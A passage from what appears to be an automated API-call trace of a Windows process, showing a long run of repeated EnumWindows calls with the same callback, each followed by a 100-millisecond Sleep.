(lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.430] Sleep (dwMilliseconds=0x64) [0132.432] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.432] Sleep (dwMilliseconds=0x64) [0132.433] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.433] Sleep (dwMilliseconds=0x64) [0132.450] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.451] Sleep (dwMilliseconds=0x64) [0132.453] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.454] Sleep (dwMilliseconds=0x64) [0132.455] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.455] Sleep (dwMilliseconds=0x64) [0132.457] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.457] Sleep (dwMilliseconds=0x64) [0132.468] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.469] Sleep (dwMilliseconds=0x64) [0132.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.470] Sleep (dwMilliseconds=0x64) [0132.472] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.472] Sleep (dwMilliseconds=0x64) [0132.474] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.474] Sleep (dwMilliseconds=0x64) [0132.475] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.475] Sleep (dwMilliseconds=0x64) [0132.477] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.477] Sleep (dwMilliseconds=0x64) [0132.480] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.480] Sleep (dwMilliseconds=0x64) [0132.534] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.534] Sleep (dwMilliseconds=0x64) [0132.535] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.536] Sleep (dwMilliseconds=0x64) [0132.537] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.537] Sleep (dwMilliseconds=0x64) [0132.538] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.539] Sleep (dwMilliseconds=0x64) [0132.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.540] Sleep (dwMilliseconds=0x64) [0132.541] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.542] Sleep (dwMilliseconds=0x64) [0132.560] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.561] Sleep (dwMilliseconds=0x64) [0132.564] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.564] Sleep (dwMilliseconds=0x64) [0132.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.566] Sleep (dwMilliseconds=0x64) [0132.567] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.567] Sleep (dwMilliseconds=0x64) [0132.568] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.569] Sleep (dwMilliseconds=0x64) [0132.587] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.587] Sleep (dwMilliseconds=0x64) [0132.589] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.589] Sleep (dwMilliseconds=0x64) [0132.590] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.590] Sleep (dwMilliseconds=0x64) [0132.591] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.592] Sleep (dwMilliseconds=0x64) [0132.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.593] Sleep (dwMilliseconds=0x64) [0132.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.595] Sleep (dwMilliseconds=0x64) [0132.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.596] Sleep (dwMilliseconds=0x64) [0132.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.598] Sleep (dwMilliseconds=0x64) [0132.599] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.599] Sleep (dwMilliseconds=0x64) [0132.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.601] Sleep (dwMilliseconds=0x64) [0132.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.602] Sleep (dwMilliseconds=0x64) [0132.604] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.604] Sleep (dwMilliseconds=0x64) [0132.605] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.605] Sleep (dwMilliseconds=0x64) [0132.607] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.607] Sleep (dwMilliseconds=0x64) [0132.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.608] Sleep (dwMilliseconds=0x64) [0132.610] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.610] Sleep (dwMilliseconds=0x64) [0132.611] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.611] Sleep (dwMilliseconds=0x64) [0132.613] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.613] Sleep (dwMilliseconds=0x64) [0132.614] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.614] Sleep (dwMilliseconds=0x64) [0132.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.621] Sleep (dwMilliseconds=0x64) [0132.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.641] Sleep (dwMilliseconds=0x64) [0132.713] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.714] Sleep (dwMilliseconds=0x64) [0132.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.715] Sleep (dwMilliseconds=0x64) [0132.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.717] Sleep (dwMilliseconds=0x64) [0132.718] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.718] Sleep (dwMilliseconds=0x64) [0132.720] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.720] Sleep (dwMilliseconds=0x64) [0132.721] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.722] Sleep (dwMilliseconds=0x64) [0132.723] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.724] Sleep (dwMilliseconds=0x64) [0132.725] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.725] Sleep (dwMilliseconds=0x64) [0132.727] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.727] Sleep (dwMilliseconds=0x64) [0132.729] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.729] Sleep (dwMilliseconds=0x64) [0132.730] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.730] Sleep (dwMilliseconds=0x64) [0132.736] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.737] Sleep (dwMilliseconds=0x64) [0132.738] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.738] Sleep (dwMilliseconds=0x64) [0132.747] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.747] Sleep (dwMilliseconds=0x64) [0132.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.797] Sleep (dwMilliseconds=0x64) [0132.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.799] Sleep (dwMilliseconds=0x64) [0132.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.808] Sleep (dwMilliseconds=0x64) [0132.810] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.811] Sleep (dwMilliseconds=0x64) [0132.812] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.812] Sleep (dwMilliseconds=0x64) [0132.813] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.814] Sleep (dwMilliseconds=0x64) [0132.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.816] Sleep (dwMilliseconds=0x64) [0132.817] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.817] Sleep (dwMilliseconds=0x64) [0132.819] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.819] Sleep (dwMilliseconds=0x64) [0132.821] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.821] Sleep (dwMilliseconds=0x64) [0132.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.823] Sleep (dwMilliseconds=0x64) [0132.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.825] Sleep (dwMilliseconds=0x64) [0132.826] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.827] Sleep (dwMilliseconds=0x64) [0132.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.828] Sleep (dwMilliseconds=0x64) [0132.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.830] Sleep (dwMilliseconds=0x64) [0132.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.832] Sleep (dwMilliseconds=0x64) [0132.833] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.834] Sleep (dwMilliseconds=0x64) [0132.835] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.835] Sleep (dwMilliseconds=0x64) [0132.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.836] Sleep (dwMilliseconds=0x64) [0132.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.838] Sleep (dwMilliseconds=0x64) [0132.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.840] Sleep (dwMilliseconds=0x64) [0132.842] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.842] Sleep (dwMilliseconds=0x64) [0132.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.844] Sleep (dwMilliseconds=0x64) [0132.845] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.846] Sleep (dwMilliseconds=0x64) [0132.847] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.847] Sleep (dwMilliseconds=0x64) [0132.849] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.849] Sleep (dwMilliseconds=0x64) [0132.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.851] Sleep (dwMilliseconds=0x64) [0132.852] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.852] Sleep (dwMilliseconds=0x64) [0132.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.854] Sleep (dwMilliseconds=0x64) [0132.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.855] Sleep (dwMilliseconds=0x64) [0132.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.861] Sleep (dwMilliseconds=0x64) [0132.862] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.863] Sleep (dwMilliseconds=0x64) [0132.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.864] Sleep (dwMilliseconds=0x64) [0132.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.866] Sleep (dwMilliseconds=0x64) [0132.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.868] Sleep (dwMilliseconds=0x64) [0132.870] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.870] Sleep (dwMilliseconds=0x64) [0132.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.873] Sleep (dwMilliseconds=0x64) [0132.874] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.874] Sleep (dwMilliseconds=0x64) [0132.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.891] Sleep (dwMilliseconds=0x64) [0132.892] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.892] Sleep (dwMilliseconds=0x64) [0132.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.894] Sleep (dwMilliseconds=0x64) [0132.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.896] Sleep (dwMilliseconds=0x64) [0132.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.897] Sleep (dwMilliseconds=0x64) [0132.963] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.965] Sleep (dwMilliseconds=0x64) [0132.966] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.966] Sleep (dwMilliseconds=0x64) [0132.967] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.967] Sleep (dwMilliseconds=0x64) [0132.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.974] Sleep (dwMilliseconds=0x64) [0132.983] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.983] Sleep (dwMilliseconds=0x64) [0132.985] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0132.987] Sleep (dwMilliseconds=0x64) [0133.009] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.010] Sleep (dwMilliseconds=0x64) [0133.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.050] Sleep (dwMilliseconds=0x64) [0133.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.052] Sleep (dwMilliseconds=0x64) [0133.053] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.053] Sleep (dwMilliseconds=0x64) [0133.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.055] Sleep (dwMilliseconds=0x64) [0133.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.056] Sleep (dwMilliseconds=0x64) [0133.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.058] Sleep (dwMilliseconds=0x64) [0133.062] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.062] Sleep (dwMilliseconds=0x64) [0133.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.065] Sleep (dwMilliseconds=0x64) [0133.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.067] Sleep (dwMilliseconds=0x64) [0133.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.070] Sleep (dwMilliseconds=0x64) [0133.073] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.073] Sleep (dwMilliseconds=0x64) [0133.076] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.076] Sleep (dwMilliseconds=0x64) [0133.077] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.077] Sleep (dwMilliseconds=0x64) [0133.079] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.079] Sleep (dwMilliseconds=0x64) [0133.082] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.083] Sleep (dwMilliseconds=0x64) [0133.084] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.084] Sleep (dwMilliseconds=0x64) [0133.086] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.086] Sleep (dwMilliseconds=0x64) [0133.088] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.088] Sleep (dwMilliseconds=0x64) [0133.089] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.089] Sleep (dwMilliseconds=0x64) [0133.091] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.091] Sleep (dwMilliseconds=0x64) [0133.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.092] Sleep (dwMilliseconds=0x64) [0133.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.094] Sleep (dwMilliseconds=0x64) [0133.095] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.095] Sleep (dwMilliseconds=0x64) [0133.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.097] Sleep (dwMilliseconds=0x64) [0133.098] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.098] Sleep (dwMilliseconds=0x64) [0133.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.100] Sleep (dwMilliseconds=0x64) [0133.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.101] Sleep (dwMilliseconds=0x64) [0133.105] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.105] Sleep (dwMilliseconds=0x64) [0133.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.107] Sleep (dwMilliseconds=0x64) [0133.109] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.109] Sleep (dwMilliseconds=0x64) [0133.110] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.111] Sleep (dwMilliseconds=0x64) [0133.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.114] Sleep (dwMilliseconds=0x64) [0133.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.116] Sleep (dwMilliseconds=0x64) [0133.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.119] Sleep (dwMilliseconds=0x64) [0133.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.122] Sleep (dwMilliseconds=0x64) [0133.123] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.124] Sleep (dwMilliseconds=0x64) [0133.127] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.127] Sleep (dwMilliseconds=0x64) [0133.129] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.129] Sleep (dwMilliseconds=0x64) [0133.130] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.131] Sleep (dwMilliseconds=0x64) [0133.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.132] Sleep (dwMilliseconds=0x64) [0133.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.135] Sleep (dwMilliseconds=0x64) [0133.275] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.275] Sleep (dwMilliseconds=0x64) [0133.277] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.277] Sleep (dwMilliseconds=0x64) [0133.279] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.279] Sleep (dwMilliseconds=0x64) [0133.280] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.280] Sleep (dwMilliseconds=0x64) [0133.282] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.282] Sleep (dwMilliseconds=0x64) [0133.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.283] Sleep (dwMilliseconds=0x64) [0133.288] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.288] Sleep (dwMilliseconds=0x64) [0133.289] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.290] Sleep (dwMilliseconds=0x64) [0133.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.294] Sleep (dwMilliseconds=0x64) [0133.297] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.297] Sleep (dwMilliseconds=0x64) [0133.298] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.298] Sleep (dwMilliseconds=0x64) [0133.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.300] Sleep (dwMilliseconds=0x64) [0133.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.302] Sleep (dwMilliseconds=0x64) [0133.315] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.318] Sleep (dwMilliseconds=0x64) [0133.331] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.331] Sleep (dwMilliseconds=0x64) [0133.332] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.332] Sleep (dwMilliseconds=0x64) [0133.333] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.334] Sleep (dwMilliseconds=0x64) [0133.335] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.335] Sleep (dwMilliseconds=0x64) [0133.336] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.337] Sleep (dwMilliseconds=0x64) [0133.338] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.338] Sleep (dwMilliseconds=0x64) [0133.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.340] Sleep (dwMilliseconds=0x64) [0133.341] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.342] Sleep (dwMilliseconds=0x64) [0133.344] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.344] Sleep (dwMilliseconds=0x64) [0133.348] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.348] Sleep (dwMilliseconds=0x64) [0133.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.353] Sleep (dwMilliseconds=0x64) [0133.356] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.356] Sleep (dwMilliseconds=0x64) [0133.357] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.357] Sleep (dwMilliseconds=0x64) [0133.358] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.359] Sleep (dwMilliseconds=0x64) [0133.360] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.360] Sleep (dwMilliseconds=0x64) [0133.362] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.362] Sleep (dwMilliseconds=0x64) [0133.363] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.363] Sleep (dwMilliseconds=0x64) [0133.364] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.365] Sleep (dwMilliseconds=0x64) [0133.366] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.366] Sleep (dwMilliseconds=0x64) [0133.367] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.368] Sleep (dwMilliseconds=0x64) [0133.369] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.369] Sleep (dwMilliseconds=0x64) [0133.370] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.371] Sleep (dwMilliseconds=0x64) [0133.372] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.372] Sleep (dwMilliseconds=0x64) [0133.374] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.374] Sleep (dwMilliseconds=0x64) [0133.381] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.382] Sleep (dwMilliseconds=0x64) [0133.384] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.384] Sleep (dwMilliseconds=0x64) [0133.385] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.385] Sleep (dwMilliseconds=0x64) [0133.387] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.387] Sleep (dwMilliseconds=0x64) [0133.390] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.391] Sleep (dwMilliseconds=0x64) [0133.392] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.392] Sleep (dwMilliseconds=0x64) [0133.394] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.394] Sleep (dwMilliseconds=0x64) [0133.396] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.396] Sleep (dwMilliseconds=0x64) [0133.398] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.398] Sleep (dwMilliseconds=0x64) [0133.400] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.400] Sleep (dwMilliseconds=0x64) [0133.401] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.402] Sleep (dwMilliseconds=0x64) [0133.403] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.403] Sleep (dwMilliseconds=0x64) [0133.405] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.405] Sleep (dwMilliseconds=0x64) [0133.406] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.407] Sleep (dwMilliseconds=0x64) [0133.408] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.408] Sleep (dwMilliseconds=0x64) [0133.409] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.410] Sleep (dwMilliseconds=0x64) [0133.415] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.415] Sleep (dwMilliseconds=0x64) [0133.416] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.417] Sleep (dwMilliseconds=0x64) [0133.418] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.418] Sleep (dwMilliseconds=0x64) [0133.419] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.419] Sleep (dwMilliseconds=0x64) [0133.421] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.421] Sleep (dwMilliseconds=0x64) [0133.425] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.425] Sleep (dwMilliseconds=0x64) [0133.433] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.434] Sleep (dwMilliseconds=0x64) [0133.527] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.527] Sleep (dwMilliseconds=0x64) [0133.528] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.529] Sleep (dwMilliseconds=0x64) [0133.530] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.530] Sleep (dwMilliseconds=0x64) [0133.531] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.531] Sleep (dwMilliseconds=0x64) [0133.533] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.533] Sleep (dwMilliseconds=0x64) [0133.534] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.535] Sleep (dwMilliseconds=0x64) [0133.536] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.536] Sleep (dwMilliseconds=0x64) [0133.537] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.537] Sleep (dwMilliseconds=0x64) [0133.539] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.539] Sleep (dwMilliseconds=0x64) [0133.540] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.541] Sleep (dwMilliseconds=0x64) [0133.542] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.542] Sleep (dwMilliseconds=0x64) [0133.543] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.543] Sleep (dwMilliseconds=0x64) [0133.545] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.545] Sleep (dwMilliseconds=0x64) [0133.546] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.546] Sleep (dwMilliseconds=0x64) [0133.548] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.548] Sleep (dwMilliseconds=0x64) [0133.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.551] Sleep (dwMilliseconds=0x64) [0133.557] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.558] Sleep (dwMilliseconds=0x64) [0133.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.559] Sleep (dwMilliseconds=0x64) [0133.560] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.560] Sleep (dwMilliseconds=0x64) [0133.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.562] Sleep (dwMilliseconds=0x64) [0133.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.563] Sleep (dwMilliseconds=0x64) [0133.565] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.565] Sleep (dwMilliseconds=0x64) [0133.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.566] Sleep (dwMilliseconds=0x64) [0133.568] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.568] Sleep (dwMilliseconds=0x64) [0133.569] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.569] Sleep (dwMilliseconds=0x64) [0133.571] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.571] Sleep (dwMilliseconds=0x64) [0133.572] EnumWindows 